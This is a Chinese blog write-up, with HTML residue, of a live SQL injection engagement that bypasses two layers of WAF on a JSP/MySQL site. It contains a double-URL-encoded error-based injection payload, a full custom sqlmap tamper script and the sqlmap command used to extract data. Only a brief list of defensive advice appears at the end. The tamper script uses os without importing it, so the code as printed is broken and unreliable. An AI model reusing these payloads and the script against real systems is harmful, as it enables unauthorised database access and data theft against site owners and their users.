实战绕过双重WAF结合SQLMap Tamper获取数据<\/h1>

前言<\/h2>
本文记录了一次针对双重WAF防护的SQL注入绕过实战经验。目标系统采用JSP环境，后端数据库为MySQL，存在两层WAF防护：第一层是云WAF，第二层可能是本地安全狗或代码层面的防护。通过多次fuzz测试，最终成功找到突破口，并利用SQLMap的tamper脚本实现数据获取。<\/p>

双重WAF分析<\/h2>

第一层：云WAF<\/h3>
使用简单的'and '1'='1<\/code>可以触发WAF拦截<\/li>
绕过方法：使用&&<\/code>替换and<\/code>并进行URL编码

示例：%26%26<\/code>代替and<\/code><\/li>
原因：云WAF可能没有对特殊字符组合进行充分检测<\/li>
<\/ul>
<\/li>
<\/ul>
第二层：本地防护<\/h3>

检测=<\/code>符号：使用like<\/code>替换=<\/code><\/li>
示例：||<\/code>代替or<\/code>，like<\/code>代替=<\/code><\/li>
<\/ul>
Fuzz测试过程<\/h2>
第一次Fuzz尝试<\/h3>
目标<\/strong>：寻找会被替换为空的字符<\/p>
方法<\/strong>：<\/p>

构造payload：123%XX321<\/code>（XX从00到FF）<\/li>
在返回结果中寻找123321<\/code>，表示中间的字符被替换为空<\/li>
结果：未找到符合条件的字符<\/li>
<\/ol>
第二次Fuzz尝试<\/h3>
方法<\/strong>：双重URL编码测试<\/p>

构造payload：123%25XX321<\/code><\/li>
发现%2527<\/code>被替换为空（%27<\/code>即单引号'）<\/li>
原理：服务器自动URL解码一次，将%27<\/code>替换为空<\/li>
<\/ol>
成功payload<\/strong>：<\/p>
123%2527321 → 123321
<\/code><\/pre>
绕过技术实现<\/h2>
报错注入测试<\/h3>
利用发现的绕过方法构造报错注入：<\/p>
'||extractvalue(1,concat(0x7e,version()))||'
<\/code><\/pre>
双重URL编码后：<\/p>
%2527||extractvalue(1,concat(0x7e,version()))||%2527
<\/code><\/pre>
SQLMap Tamper定制<\/h3>
目标<\/strong>：自动化利用发现的绕过方法<\/p>
修改percentage.py tamper脚本<\/strong>：<\/p>

原始功能：在每个字符前加%<\/code><\/li>
修改为：在每个字符前加%2527<\/code><\/li>
关键修改点：<\/li>
<\/ol>
retVal +=<\/span> '<\/span>%%<\/span>2527<\/span>%s<\/span>'<\/span> %<\/span> payload[i]
<\/span><\/span><\/code><\/pre>
额外处理：将=<\/code>替换为like<\/code><\/li>
<\/ol>
retVal =<\/span> re.<\/span>sub(r<\/span>"\s*=\s*"<\/span>, " LIKE "<\/span>, retVal)
<\/span><\/span><\/code><\/pre>完整tamper脚本<\/strong>：<\/p>
#!\/usr\/bin\/env python<\/span>
<\/span><\/span>
<\/span><\/span>"""
<\/span><\/span><\/span>Copyright (c) 2006-2020 sqlmap developers (http:\/\/sqlmap.org\/)
<\/span><\/span><\/span>See the file 'LICENSE' for copying permission
<\/span><\/span><\/span>"""<\/span>
<\/span><\/span>
<\/span><\/span>from<\/span> lib.core.enums import<\/span> PRIORITY
<\/span><\/span>from<\/span> lib.core.common import<\/span> singleTimeWarnMessage
<\/span><\/span>import<\/span> re
<\/span><\/span>
<\/span><\/span>__priority__ =<\/span> PRIORITY.<\/span>LOW
<\/span><\/span>
<\/span><\/span>def<\/span> dependencies<\/span>():
<\/span><\/span>    singleTimeWarnMessage("tamper script '<\/span>%s<\/span>' is unlikely to work against non-MySQL targets"<\/span> %<\/span> os.<\/span>path.<\/span>basename(__file__).<\/span>split("."<\/span>)[0<\/span>])
<\/span><\/span>
<\/span><\/span>def<\/span> tamper<\/span>(payload, **<\/span>kwargs):
<\/span><\/span>    """
<\/span><\/span><\/span>    Adds a percentage sign ('%2527') in front of each character
<\/span><\/span><\/span>
<\/span><\/span><\/span>    Requirement:
<\/span><\/span><\/span>        * MySQL
<\/span><\/span><\/span>
<\/span><\/span><\/span>    Tested against:
<\/span><\/span><\/span>        * MySQL 5.0
<\/span><\/span><\/span>
<\/span><\/span><\/span>    Notes:
<\/span><\/span><\/span>        * Useful to bypass weak web application firewalls when the
<\/span><\/span><\/span>          backend DBMS is MySQL
<\/span><\/span><\/span>    """<\/span>
<\/span><\/span>
<\/span><\/span>    retVal =<\/span> ""<\/span>
<\/span><\/span>
<\/span><\/span>    if<\/span> payload:
<\/span><\/span>        for<\/span> i in<\/span> range(len(payload)):
<\/span><\/span>            retVal +=<\/span> '<\/span>%%<\/span>2527<\/span>%s<\/span>'<\/span> %<\/span> payload[i]
<\/span><\/span>        retVal =<\/span> re.<\/span>sub(r<\/span>"\s*=\s*"<\/span>, " LIKE "<\/span>, retVal)
<\/span><\/span>
<\/span><\/span>    return<\/span> retVal
<\/span><\/span><\/code><\/pre>SQLMap使用命令<\/h2>
python2 sqlmap.py -r "request.txt" --dbms=mysql --technique=E --tamper mypercentage
<\/code><\/pre>
参数说明：<\/p>

-r<\/code>：从文件加载HTTP请求<\/li>
--dbms=mysql<\/code>：指定MySQL数据库<\/li>
--technique=E<\/code>：使用报错注入技术<\/li>
--tamper mypercentage<\/code>：使用自定义的tamper脚本<\/li>
<\/ul>
关键知识点总结<\/h2>


双重WAF绕过思路<\/strong>：<\/p>

分层分析，逐层突破<\/li>
第一层云WAF：特殊字符组合绕过<\/li>
第二层本地防护：关键字替换<\/li>
<\/ul>
<\/li>

Fuzz测试技巧<\/strong>：<\/p>

使用Burp Suite Intruder进行系统化测试<\/li>
设置响应结果匹配标志（如123321）<\/li>
测试范围：从00到FF的所有字符<\/li>
<\/ul>
<\/li>

双重URL编码绕过<\/strong>：<\/p>

%2527<\/code> → 服务器解码为%27<\/code> → 被替换为空<\/li>
有效隐藏了单引号等敏感字符<\/li>
<\/ul>
<\/li>

SQLMap Tamper定制<\/strong>：<\/p>

理解tamper脚本工作原理<\/li>
根据实际绕过需求修改字符处理逻辑<\/li>
结合关键字替换增强绕过能力<\/li>
<\/ul>
<\/li>

报错注入利用<\/strong>：<\/p>

利用MySQL的extractvalue<\/code>等函数<\/li>
结合绕过方法构造有效payload<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

对WAF规则进行严格测试，确保能检测各种编码变体<\/li>
实现多层防御机制，包括输入验证、参数化查询等<\/li>
监控和记录异常请求模式<\/li>
定期更新WAF规则以应对新型攻击手法<\/li>
<\/ol>
通过这种系统化的测试和绕过方法，即使面对复杂的WAF防护，也能找到有效的注入突破口。关键在于耐心测试和对各种绕过技术的灵活组合应用。<\/p>